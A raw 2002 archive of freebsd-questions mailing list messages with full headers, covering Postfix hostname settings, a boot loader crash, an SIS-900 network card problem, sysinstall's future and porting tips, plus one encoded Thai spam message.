Subject: Re: freebsd && postfix References: <3D180DC8.2030403@gmx.net> <86wusnzt21.fsf@unicorn.ea4els.ampr.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Simon J Mudd wrote: >s.dale@gmx.net (Sunny Dale) writes: > > > >>hello people, >>-i am running FreeBSD 4.4release with postfix-1.1.11. >>-in main.cf i have set myhostname/mydomain/myorigin >>-postconf -n shows me that all of those parameters are set correctly. >> >>still postfix seems to get *its hostname* from gethostname(). when i >>do "hostname " suddenly it starts working. i'd prefer to set the >>hostname in main.cf though. >> >> > >Wietse, the author, uses Postfix as his development platform. The >symptoms you report appear to be rather strange. Perhaps it would >help if you showed us. > >>From postfix stopped: >1. the output of postconf -n >2. the output of postfix start (if this is how you start postfix) >3. the log entries which show that Postfix doesn't like/use the >hostname in main.cf >4. you may need to enable debugging information in the part of Postfix >which is failing (add a -v to the entry in /etc/postfix/master.cf) > > > >>ps. if this question is moron ignore it. >> >> > >The question appears strange but you not shown _any_ information to >back up what you say, so the symptoms may be related to something >else. > >Show us the output and perhaps we can determine what is happening. > >Simon >-- >Simon J Mudd, Tel: +34-91-408 4878, Mobile: +34-605-085 219 >Madrid, Spain. email: sjmudd@pobox.com, Postfix RPM Packager > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-questions" in the body of the message > > > > i have put the requested information on: http://217.110.232.171/index.txt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 1:56:56 2002 Delivered-To: freebsd-questions@freebsd.org Received: from protactinium.btinternet.com (protactinium.btinternet.com [194.73.73.176]) by hub.freebsd.org (Postfix) with ESMTP id 7245337B414 for ; Tue, 25 Jun 2002 01:56:11 -0700 (PDT) Received: from host217-40-232-139.in-addr.btopenworld.com ([217.40.232.139] helo=tachief.com) by protactinium.btinternet.com with smtp (Exim 3.22 #8) id 17Mm7N-0000VM-00 for freebsd-questions@freebsd.org; Tue, 25 Jun 2002 09:56:09 +0100 Received: (qmail 22018 invoked from network); 25 Jun 2002 09:47:43 -0000 Received: from localhost (HELO cordelia.tachief.com) (127.0.0.1) by 0 with SMTP; 25 Jun 2002 09:47:43 -0000 Received: (from nick@localhost) by cordelia.tachief.com (8.12.1/8.12.1/Submit) id g5P9lfEk003924 for freebsd-questions@freebsd.org; Tue, 25 Jun 2002 09:47:41 GMT X-Authentication-Warning: cordelia.tachief.com: nick set sender to nick@tachief.com using -f Date: Tue, 25 Jun 2002 09:47:41 +0000 From: Nick Jones To: freebsd-questions@freebsd.org Subject: Loader causing reset on 4.6-STABLE Message-ID: <20020625094741.GC19826@cordelia.tachief.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.25i X-Operating-System: OpenBSD/3.0 (i386) X-Uptime: 9:46AM up 1:51, 2 users, load averages: 0.46, 0.41, 0.39 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I originally posted this to -stable, but as it seems to have stumped everyone there I thought I'd give you guys a try instead. I'm fairly certain it's not -STABLE specific anyway. Since updating my sources on the 17th and upgrading to 4.6-STABLE, I've encountered a problem with getting my machine to successfully boot. Before loader even finishes initialising, my box just resets. Some kind of error is echoed to the screen, and I've managed to capture this via a serial console: ------ FreeBSD/i386 bootstrap loader, Revision 0.8 (nick@tachief.com, Tue Jun 18 11:49:18 BST 2002) Loading /boot/defaults/loader.conf Console: serial port BIOS drive A: is disk2 BIOS drive C: is disk3 BIOS 640kB/261108kB available memory FreeBSD/i386 bootstrap loader, Revision 0.8 (nick@tachief.com, Tue Jun 18 11:49:18 BST 2002) Can't work out which disk we are booting from. Guessed BIOS device 0xffffffff not found by probes, defaulting to disk0: Console: serial port BIOS drive A: is disk4 BIOS drive C: is disk5 BIOS 640kB/261108kB available memory FreeBSD/i386 bootstrap loader, Revision 0.8 (nick@tachief.com, Tue Jun 18 11:49:18 BST 2002) Can't work out which disk we are booting from. Guessed BIOS device 0xffffffff not found by probes, defaulting to disk0: panic: free: guard1 fail @ 0x37574 ------ I can, however, issue a ^C just after I've selected which disk to boot from in the bootloader and before loader causes my box to reset. This then allows me to boot /kernel (instead of /boot/loader), and apart from it complaining about loader metadata being missing, it continues to boot and function just fine. So, any ideas? I've not noticed anyone else complain of a similar problem so far with -STABLE, and I'm at a bit of a loss as to what to try next. The hardware is fairly standard - Intel Celeron 433, Asus BX-based mainboard, Adaptec 2940U SCSI controller, and the bootdisk is an IBM DNES-309170 (9.1GB SCSI) designated da0. -- - Nick Jones | nick@tachief.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 2:10:56 2002 Delivered-To: freebsd-questions@freebsd.org Received: from 217-126-145-95.uc.nombres.ttd.es (217-126-145-95.uc.nombres.ttd.es [217.126.145.95]) by hub.freebsd.org (Postfix) with ESMTP id 1D9A037B406 for ; Tue, 25 Jun 2002 02:10:46 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by phoenix.ea4els.ampr.org (Postfix) with ESMTP id 8FDAA16BC3 for ; Tue, 25 Jun 2002 11:10:43 +0200 (CEST) Date: Tue, 25 Jun 2002 11:10:43 +0200 (CEST) From: Simon J Mudd To: freebsd-questions@freebsd.org Subject: Re: freebsd && postfix In-Reply-To: <3D182BC3.70801@gmx.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Don't Cc: me I'm subscribed to -questions. On Tue, 25 Jun 2002, Sunny Dale wrote: > i have put the requested information on: http://217.110.232.171/index.txt Your showed the following output: /var/log/maillog entry: Jun 25 10:27:04 zoe sendmail[27624]: g5P8Qv427622: to=s.dale@gmx.net, ctladdr=wj (1000/1000), delay=00:00:07, xdelay=00:00:07, mailer=esmtp, pri=30106, relay=mx0.gmx.de. [213.165.64.100], dsn=5.0.0, stat=Service unavailable (the message was injected into postfix using a php script thats why its using the "postfix sendmail" binary) This is NOT postfix: it's sendmail. try using the postfix "sendmail" binary. Simon -- Simon J Mudd, Tel: +34-91-408 4878, Mobile: +34-605-085 219 Madrid, Spain. email: sjmudd@pobox.com, Postfix RPM Packager To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 2:18:44 2002 Delivered-To: freebsd-questions@freebsd.org Received: from beech.FernUni-Hagen.de (beech.fernuni-hagen.de [132.176.114.20]) by hub.freebsd.org (Postfix) with ESMTP id B4CC037B400; Tue, 25 Jun 2002 02:18:25 -0700 (PDT) Received: from es-i2.fernuni-hagen.de ([132.176.7.81]) by beech.FernUni-Hagen.de with esmtp (Exim 3.22 #15) id 17MmSu-0003Bj-00; Tue, 25 Jun 2002 11:18:24 +0200 Received: from jfh00.fernuni-hagen.de (jfh00.fernuni-hagen.de [132.176.7.6]) by es-i2.fernuni-hagen.de (8.12.4/8.12.3) with ESMTP id g5P9INKv069410; Tue, 25 Jun 2002 11:18:23 +0200 (CEST) (envelope-from jfh@es-i2.fernuni-hagen.de) Received: from jfh00.fernuni-hagen.de (localhost [127.0.0.1]) by jfh00.fernuni-hagen.de (8.12.4/8.12.3) with ESMTP id g5P9IOxv043017; Tue, 25 Jun 2002 11:18:24 +0200 (CEST) (envelope-from jfh@jfh00.fernuni-hagen.de) Received: (from jfh@localhost) by jfh00.fernuni-hagen.de (8.12.4/8.12.3/Submit) id g5P9IOY7043016; Tue, 25 Jun 2002 11:18:24 +0200 (CEST) Date: Tue, 25 Jun 2002 11:18:23 +0200 From: "fritz.heinrichmeyer" To: freebsd-questions@freebsd.org, freebsd-hardware@freebsd.org Cc: "F. Heinrichmeyer" Subject: K7s5a,SIS-900,Eumex724 does not work Message-ID: <20020625091823.GA2369@jfh00.fernuni-hagen.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Now that i have a new home network i activated the on board SIS-900 NIC for a k7s5a motherboard. I replaced a BNC based network with today common STP cable network I have no sufficient access to my dsl router/internet under FreeBSD with the SIS-900 onboard NIC. The DSL router is a combined router/telephone system (EUMEX724). About 50 % of data packets are erroneous. I already played with MTU=1492, no change. Is anybody using the SIS-900 successfully out there? I could imagine it is a problem with the combination EUMEX724/Sis900 because this performance makes the SIS NIC useless for everybody. It works fine under windows and worked with my old 10 Mbit STP/BNC realtec card equally fine under windows and FreeBSD. The realtec nic works also fine with the EUMEX724-Router on a Win98-box now in STP mode. Greetings Fritz Heinrichmeyer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 2:21:27 2002 Delivered-To: freebsd-questions@freebsd.org Received: from lexx.zssm.zp.ua (lexx.zssm.zp.ua [212.8.32.8]) by hub.freebsd.org (Postfix) with ESMTP id 0508D37B405 for ; Tue, 25 Jun 2002 02:21:00 -0700 (PDT) Received: from server.hermes-comp.zp.ua (germes-comp.zssm.zp.ua [212.8.32.132] (may be forged)) by lexx.zssm.zp.ua (8.9.2/8.9.2) with ESMTP id MAA21409 for ; Tue, 25 Jun 2002 12:12:19 +0300 (EET DST) Received: from localhost (localhost [127.0.0.1]) by server.hermes-comp.zp.ua (Postfix) with ESMTP id 6264438302 for ; Tue, 25 Jun 2002 12:18:12 +0300 (EEST) Date: Tue, 25 Jun 2002 12:18:11 +0300 (EEST) From: Alexander V Zubchenko To: FreeBSD Questions Subject: Sysinstall replacement Message-ID: <20020625121609.B1498-100000@server.hermes-comp.zp.ua> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Greetings, All! I've read in manpage sysinstall(8): "This product is currently at the end of it's life cycle and will eventually be replaced". For what kind of thing it will, and when? Just pure interest. If somebody know. With respect to all FreeBSD community, Alexander V Zubchenko, E-Mail: stalker@hermes-comp.zp.ua System Administrator, WWW: http://www.hermes-comp.zp.ua/ Hermes-comp, Ukraine, Zaporizhzhya, Geroev Stalingrada 50 phone/fax: +380 612 64-19-72 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 2:23:50 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web20010.mail.yahoo.com (web20010.mail.yahoo.com [216.136.225.73]) by hub.freebsd.org (Postfix) with SMTP id E550F37B400 for ; Tue, 25 Jun 2002 02:23:42 -0700 (PDT) Message-ID: <20020625092342.83810.qmail@web20010.mail.yahoo.com> Received: from [193.123.204.66] by web20010.mail.yahoo.com via HTTP; Tue, 25 Jun 2002 10:23:42 BST Date: Tue, 25 Jun 2002 10:23:42 +0100 (BST) From: =?iso-8859-1?q?Gavin=20Kenny?= Subject: Porting Tips To: questions@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi Guys, I'm going to have a go at porting the VideoLan Server to FreeBSD. It was written for Linux and there is a Darwin (Mac OS) port, so I'm kinda hoping it shouldn't be too hard (famous last words). I never written anything for FreeBSD, so what should I look out for? Any good pointers, tips, different naming conventions for libraries etc or better still HOW-TO's, would be really useful. thanks Gavin __________________________________________________ Do You Yahoo!? Everything you'll ever need on one web page from News and Sport to Email and Music Charts http://uk.my.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 2:47: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from protactinium.btinternet.com (protactinium.btinternet.com [194.73.73.176]) by hub.freebsd.org (Postfix) with ESMTP id A29E837B66B for ; Tue, 25 Jun 2002 02:46:37 -0700 (PDT) Received: from host217-40-232-139.in-addr.btopenworld.com ([217.40.232.139] helo=tachief.com) by protactinium.btinternet.com with smtp (Exim 3.22 #8) id 17MmuC-0007W0-00 for freebsd-questions@freebsd.org; Tue, 25 Jun 2002 10:46:36 +0100 Received: (qmail 17696 invoked from network); 25 Jun 2002 10:38:10 -0000 Received: from localhost (HELO cordelia.tachief.com) (127.0.0.1) by 0 with SMTP; 25 Jun 2002 10:38:10 -0000 Received: (from nick@localhost) by cordelia.tachief.com (8.12.1/8.12.1/Submit) id g5PAc9cw026899; Tue, 25 Jun 2002 10:38:09 GMT X-Authentication-Warning: cordelia.tachief.com: nick set sender to nick@tachief.com using -f Date: Tue, 25 Jun 2002 10:38:09 +0000 From: Nick Jones To: ro0t Cc: freebsd-questions@freebsd.org Subject: Re: Loader causing reset on 4.6-STABLE Message-ID: <20020625103808.GD19826@cordelia.tachief.com> References: <20020625094741.GC19826@cordelia.tachief.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.25i X-Operating-System: OpenBSD/3.0 (i386) X-Uptime: 10:28AM up 2:33, 2 users, load averages: 0.25, 0.31, 0.32 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002 at 05:06:57 -0400, ro0t wrote: > I could be wrong, but i dont see how updating your sources could have done > that. It seems like maybe something wrote somewhere it shouldnt have. try > reinstalling the boot loader. I have never had to do this before, so i cant > help ya but i bet theres a way. try the handbook. It seems that loader is causing the difficulty, and this would have been rebuilt as part of the upgrade process. I've temporarily solved the problem by copying across /boot/loader built on a 4.5-STABLE machine to this box, but I really need a more permanent solution :) -- - Nick Jones | nick@tachief.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 2:55:35 2002 Delivered-To: freebsd-questions@freebsd.org Received: from rutger.owt.com (rutger.owt.com [204.118.6.16]) by hub.freebsd.org (Postfix) with ESMTP id D60C337B489 for ; Tue, 25 Jun 2002 02:51:15 -0700 (PDT) Received: from owt.com (owt-207-41-94-232.owt.com [207.41.94.232]) by rutger.owt.com (8.9.3/8.9.3) with ESMTP id CAA26512; Tue, 25 Jun 2002 02:51:12 -0700 Message-ID: <3D183D0F.1050809@owt.com> Date: Tue, 25 Jun 2002 02:51:11 -0700 From: Kent Stewart User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.4.1) Gecko/20020314 Netscape6/6.2.2 X-Accept-Language: en-us, es-mx MIME-Version: 1.0 To: "fritz.heinrichmeyer" Cc: freebsd-questions@FreeBSD.ORG Subject: Re: K7s5a,SIS-900,Eumex724 does not work References: <20020625091823.GA2369@jfh00.fernuni-hagen.de> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG fritz.heinrichmeyer wrote: > Now that i have a new home network i activated the on board SIS-900 NIC > for a k7s5a motherboard. I replaced a BNC based network with today > common STP cable network > > I have no sufficient access to my dsl router/internet under FreeBSD with > the SIS-900 onboard NIC. The DSL router is a combined router/telephone > system (EUMEX724). About 50 % of data packets are erroneous. I already > played with MTU=1492, no change. > > Is anybody using the SIS-900 successfully out there? I have 2 - k7s5a's and an Amptron K7-830LM, which is a similar board. I use the sis driver and get 11-12 MB/s on ftp transfers between the 3 machines. > > I could imagine it is a problem with the combination EUMEX724/Sis900 > because this performance makes the SIS NIC useless for everybody. > > It works fine under windows and worked with my old 10 Mbit STP/BNC > realtec card equally fine under windows and FreeBSD. The realtec nic > works also fine with the EUMEX724-Router on a Win98-box now in STP mode. Are you having 10baseT and half duplex problems with the sis0. I don't have any idea what it is defaulting to. Kent > > Greetings > Fritz Heinrichmeyer > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > > . > > -- Kent Stewart Richland, WA http://users.owt.com/kstewart/index.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 2:56:36 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mx1.ovh.net (b1.ovh.net [213.186.33.51]) by hub.freebsd.org (Postfix) with ESMTP id 83F9E37B4AC for ; Tue, 25 Jun 2002 02:52:09 -0700 (PDT) Received: (qmail 8847 invoked by uid 503); 25 Jun 2002 09:51:08 -0000 Received: from unknown (HELO gueway.home) (212.43.212.24) by ns0.ovh.net with DES-CBC3-SHA encrypted SMTP; 25 Jun 2002 09:51:08 -0000 Received: from greatoak.home (greatoak.home [192.168.1.2]) by gueway.home (8.12.2/8.12.2) with ESMTP id g5P9pxYL001688 for ; Tue, 25 Jun 2002 11:52:03 +0200 (CEST) (envelope-from pcasidy@greatoak.home) Message-Id: <200206250952.g5P9pxYL001688@gueway.home> Date: Tue, 25 Jun 2002 11:54:21 +0200 (CEST) From: Philippe CASIDY Subject: Re: Amount of FreeBSD servers is decreasing in servers statistics To: "FreeBSD.org Questions" In-Reply-To: <3D181E75.5030607@rambo.simx.org> MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 25 Jun, Roger 'Rocky' Vetterberg wrote: > Philippe CASIDY wrote: >> I read that I were using Apache2 on unknown where I expected it to be : > > The same happened to me after upgrading to FreeBSD 4.6. > My guess is that something changed between 4.5 to 4.6 that makes > Netcraft unable to recognize the os. It will probably not take > long before Netcraft notices and updates their detection software > to correctly identify FreeBSD 4.6 as well. > Do I have to understand that it has always happend like this? and that netcraft people will notice that and fixed that on their side? Thanks Phil. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3: 7: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hotmail.com (oe24.pav2.hotmail.com [64.4.36.81]) by hub.freebsd.org (Postfix) with ESMTP id 8A8E137B686; Tue, 25 Jun 2002 02:55:14 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 25 Jun 2002 02:55:11 -0700 X-Originating-IP: [203.144.144.233] From: "mont" To: Subject: =?windows-874?B?cGFydC10aW1lIDUsMDAwLTEwLDAwMCCk2LOh57fT5LTpICEhIQ==?= Date: Tue, 25 Jun 2002 16:45:57 +0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0205_01C21C67.C7D305E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-ID: X-OriginalArrivalTime: 25 Jun 2002 09:55:11.0687 (UTC) FILETIME=[6581BD70:01C21C2E] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0205_01C21C67.C7D305E0 Content-Type: text/plain; charset="windows-874" Content-Transfer-Encoding: quoted-printable = =C3=D0=BA=BA=A1=D2=C3=B7=D3=A7=D2=B9=A2=CD=A7=B8=D8=C3=A1=D4=A8=E3=B9=CD=B9= =D2=A4=B5 =B7=D3=E4=B4=E9=A7=E8=D2=C2 = =E1=C5=D0=CA=C3=E9=D2=A7=C3=D2=C2=E4=B4=E9=A7=D2=C1=A8=D2=A1=A1=D2=C3=B7=D3= =A7=D2=B9=BC=E8=D2=B9=C3=D0=BA=BA =BC=C1=C1=D5=C3=D2=C2=E4=B4=E9=C1=D2=A1=A1=C7=E8=D2 30,000 / = =E0=B4=D7=CD=B9 = =A8=D2=A1=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D5=C2=A7=C7=D1=B9=C5=D0 2-3 = =AA=D1=E8=C7=E2=C1=A7=E0=B7=E8=D2=B9=D1=E9=B9 =E2=CD=A1=D2=CA=C1=D2=B6=D6=A7=A4=D8=B3=E1=C5=E9=C7 ! = =E0=CB=C5=D7=CD=E1=B5=E8=E0=BE=D5=C2=A7=A4=D8=B3=A8=D0=A4=C7=E9=D2=C1=D1=B9= =CB=C3=D7=CD=E0=BB=C5=E8=D2 =A1=D2=C3=BA=C3=C3=C2=D2=C2=E1=B9=D0=B9=D3=B8=D8=C3=A1=D4=A8 = International E-Business =E0=C3=D5=C2=B9=C3=D9=E9=C7=D4=B8=D5=A1=D2=C3=B7=D3=A7=D2=B9 = =B8=D8=C3=A1=D4=A8=B9=D2=B9=D2=AA=D2=B5=D4 =BA=B9 Internet=20 = =E0=C3=D5=C2=B9=C3=D9=E9=E1=BC=B9=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D4=E8=C1=C3= =D2=C2=E4=B4=E9=BE=D4=E0=C8=C9=E3=B9=E1=B5=E8=C5=D0=E0=B4=D7=CD=B9 = =E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA=BA=B7= =D3=A7=D2=B9 Part-time 15,000 =B6=D6=A7 60,000 =BA=D2=B7/=E0=B4=D7=CD=B9 =E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 : 7- 14 =AA=C1. = /=CA=D1=BB=B4=D2=CB=EC=20 = =E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA=BA=B7= =D3=A7=D2=B9 full-time 30,000 =B6=D6=A7 170,000 =BA=D2=B7/=E0=B4=D7=CD=B9 =E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 : 20- 40 =AA=C1. = /=CA=D1=BB=B4=D2=CB=EC=20 =A2=E8=D2=C7=B4=D5 ! =CA=D3=CB=C3=D1=BA = =BC=D9=E9=B7=D5=E8=CD=C2=D9=E8=E3=B9=E0=A2=B5 =A1=C3=D8=A7=E0=B7=BE=CF = =E1=C5=D0=BB=C3=D4=C1=C5=B1=C5 = =CA=D3=C3=CD=A7=B7=D5=E8=B9=D1=E8=A7=E0=BE=D7=E8=CD=BF=D1=A7=A1=D2=C3=BA=C3= =C3=C2=D2=C2 =BF=C3=D5 !!! = ************************************************************* = =A2=CD=CD=C0=D1=C2=CB=D2=A1=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=E4=BB=B6=D6=A7=A4= =D8=B3=E2=B4=C2=BA=D1=A7=E0=CD=D4=AD=CB=D2=A1=A4=D8=B3=E4=C1=E8=B5=E9=CD=A7= =A1=D2=C3=C3=D1=BA=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=CD=D5=A1 =A1=C3=D8=B3=D2 =E1=A8=E9=A7 Mail = =A2=CD=A7=A4=D8=B3=B7=D5=E8=B5=E9=CD=A7=A1=D2=C3=C5=BA=C1=D2=B7=D5=E8 = "Unsubscribe" =20 =20 ------=_NextPart_000_0205_01C21C67.C7D305E0 Content-Type: text/html; charset="windows-874" Content-Transfer-Encoding: quoted-printable

=C3=D0=BA=BA=A1=D2=C3=B7=D3=A7=D2=B9=A2=CD=A7=B8=D8=C3=A1=D4=A8= =E3=B9=CD=B9=D2=A4=B5
=B7=D3=E4=B4=E9=A7=E8=D2=C2=20 = =E1=C5=D0=CA=C3=E9=D2=A7=C3=D2=C2=E4=B4=E9=A7=D2=C1=A8=D2=A1=A1=D2=C3=B7=D3= =A7=D2=B9=BC=E8=D2=B9=C3=D0=BA=BA
=BC=C1=C1=D5=C3=D2=C2=E4=B4=E9=C1=D2=A1=A1=C7=E8=D2=20 30,000 / =E0=B4=D7=CD=B9 = =A8=D2=A1=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D5=C2=A7=C7=D1=B9=C5=D0 2-3=20 = =AA=D1=E8=C7=E2=C1=A7=E0=B7=E8=D2=B9=D1=E9=B9

=E2=CD=A1=D2=CA=C1=D2=B6=D6=A7=A4=D8=B3=E1=C5=E9=C7=20 !
=E0=CB=C5=D7=CD=E1=B5=E8=E0=BE=D5=C2=A7=A4=D8=B3=A8=D0=A4=C7= =E9=D2=C1=D1=B9=CB=C3=D7=CD=E0=BB=C5=E8=D2

=A1=D2=C3=BA=C3=C3=C2=D2=C2=E1=B9=D0=B9=D3=B8=D8=C3=A1=D4= =A8 International=20 E-Business
=E0=C3=D5=C2=B9=C3=D9=E9=C7=D4=B8=D5=A1=D2=C3=B7=D3=A7=D2= =B9 =B8=D8=C3=A1=D4=A8=B9=D2=B9=D2=AA=D2=B5=D4 =BA=B9 Internet=20
=E0=C3=D5=C2=B9=C3=D9=E9=E1=BC=B9=A1=D2=C3=B7=D3=A7=D2=B9= =E0=BE=D4=E8=C1=C3=D2=C2=E4=B4=E9=BE=D4=E0=C8=C9=E3=B9=E1=B5=E8=C5=D0=E0=B4= =D7=CD=B9

=E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA= =BA=B7=D3=A7=D2=B9 Part-time
15,000 =B6=D6=A7 = 60,000=20 = =BA=D2=B7/=E0=B4=D7=CD=B9
=E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 = : 7- 14 =AA=C1. /=CA=D1=BB=B4=D2=CB=EC=20 =
=E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA= =BA=B7=D3=A7=D2=B9 full-time
30,000 =B6=D6=A7 170,000=20 = =BA=D2=B7/=E0=B4=D7=CD=B9
=E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 = : 20- 40 =AA=C1. /=CA=D1=BB=B4=D2=CB=EC

=A2=E8=D2=C7=B4=D5=20 !     = =CA=D3=CB=C3=D1=BA = =BC=D9=E9=B7=D5=E8=CD=C2=D9=E8=E3=B9=E0=A2=B5=20 =A1=C3=D8=A7=E0=B7=BE=CF  = =E1=C5=D0=BB=C3=D4=C1=C5=B1=C5
=CA=D3=C3=CD=A7=B7=D5=E8=B9=D1=E8=A7=E0=BE=D7=E8=CD=BF=D1=A7=A1=D2= =C3=BA=C3=C3=C2=D2=C2   = =BF=C3=D5 !!!
*************************************************************
          &nbs= p; =20 =A2=CD=CD=C0=D1=C2=CB=D2=A1=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=E4=BB= =B6=D6=A7=A4=D8=B3=E2=B4=C2=BA=D1=A7=E0=CD=D4=AD=CB=D2=A1=A4=D8=B3=E4=C1=E8= =B5=E9=CD=A7=A1=D2=C3=C3=D1=BA=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=CD=D5=A1
=   =20 =            =        =20 =A1=C3=D8=B3=D2 =E1=A8=E9=A7 Mail=20 = =A2=CD=A7=A4=D8=B3=B7=D5=E8=B5=E9=CD=A7=A1=D2=C3=C5=BA=C1=D2=B7=D5=E8 = "Unsubscribe"

------=_NextPart_000_0205_01C21C67.C7D305E0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3: 7:35 2002 Delivered-To: freebsd-questions@freebsd.org Received: from martin.kleinerdrache.org (static62-99-146-055.adsl.inode.at [62.99.146.55]) by hub.freebsd.org (Postfix) with SMTP id 1590337B8BF for ; Tue, 25 Jun 2002 03:00:13 -0700 (PDT) Received: (qmail 11165 invoked from network); 25 Jun 2002 10:02:39 -0000 Received: from unknown (HELO localhost.kdrache.org) (127.0.0.1) by loopback with SMTP; 25 Jun 2002 10:02:39 -0000 Subject: Re: Porting Tips From: Martin Klaffenboeck To: Gavin Kenny Cc: questions@freebsd.org In-Reply-To: <20020625092342.83810.qmail@web20010.mail.yahoo.com> References: <20020625092342.83810.qmail@web20010.mail.yahoo.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 25 Jun 2002 12:02:39 +0200 Message-Id: <1024999359.677.16.camel@martin.kleinerdrache.org> Mime-Version: 1.0 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: 